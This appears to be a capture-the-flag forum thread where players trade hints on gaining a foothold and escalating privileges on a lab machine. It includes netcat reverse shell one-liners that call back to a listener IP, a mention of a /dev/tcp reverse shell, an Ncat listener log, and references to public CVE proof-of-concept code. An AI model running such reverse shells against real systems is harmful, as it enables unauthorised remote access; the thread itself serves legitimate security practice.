Alright, I'm stuck, I'll try some more tomorrow, good luck to you guys.
GG. Here's to a new season. If anyone needs a hint, hit me up after the 24 hour mark.
Did anyone get further with root? I found the stuff discussed here but it doesn't seem to be it
Any hint 4 d root flag?
some hints? for root
I'm also having difficulties on privesc. So many things feel to be off on this machine.
My guess is that something has to be done with that java environment but I really don't know where to start from.
To get initial foothold I've tried multiple different CVEs -
The java one with the interface will execute a few commands like ls but even something as simple as cd it returns "Not executed for security reason".
Of course first I tried a barebones /dev/tcp bash reverse shell, that wouldn't work.
A netcat reverse shell DID connect, and I've tried searching to figure out what the issue is - the beginning of the connection looks like this but will not take a command:
Ncat: Version 7.93 ( Ncat - Netcat for the 21st Century )
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on :::8080
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:8080
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 4 is ready
Ncat: Connection from 10.129.14.105.
NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0)
NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4
NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4)
NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0
Ncat: Connection from 10.129.14.105:58180.
NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5
NCAT DEBUG: Added fd 5 to list, nfds 1, maxfd 5
NCAT DEBUG: selecting, fdmax 5
Looks like others have had the netcat issue and said it has something to do with the jdk version but it did the same thing for me with a python script…?
EDIT #2:
For anyone having similar issues, it was NOT the CVE POC that was at fault for not giving me the shell. So here I learned to use full paths for your shell executable.
not really a spoiler, but gives the specific reverse shell code that worked for me:
nc 10.10.10.10 9001 -e bash
and MANY other reverse shell options wouldn't work.
nc -e /bin/bash 10.10.10.10 9001
however worked perfectly!
Are you talking of the foothold? Or the privesc part?
Still unable to get shell. PoC not working. Any suggestions?
If your POC doesn't work well, try to find another one on Github related to the CVE you identified
edited post for clarity. talking about the initial foothold.
Can you please give any hint for privilege escalation?
Anyone any hint for privilege escalation please
Nice One
Congrats!
Do I need to use tools like ysoserial for the foothold? Can't get it to work and don't want to be wasting time. Thanks!
Finally!
502 Bad gateway …
The CVEs I found on Github require a login page but I couldn't find any on the website?
Put it this way, you don't have to find the actual login form or tell it where it is.
There are python and java versions. I'd suggest using one of the python versions and remember to always look at the code you're running. It knows where the login endpoint is and you can easily find the form from there.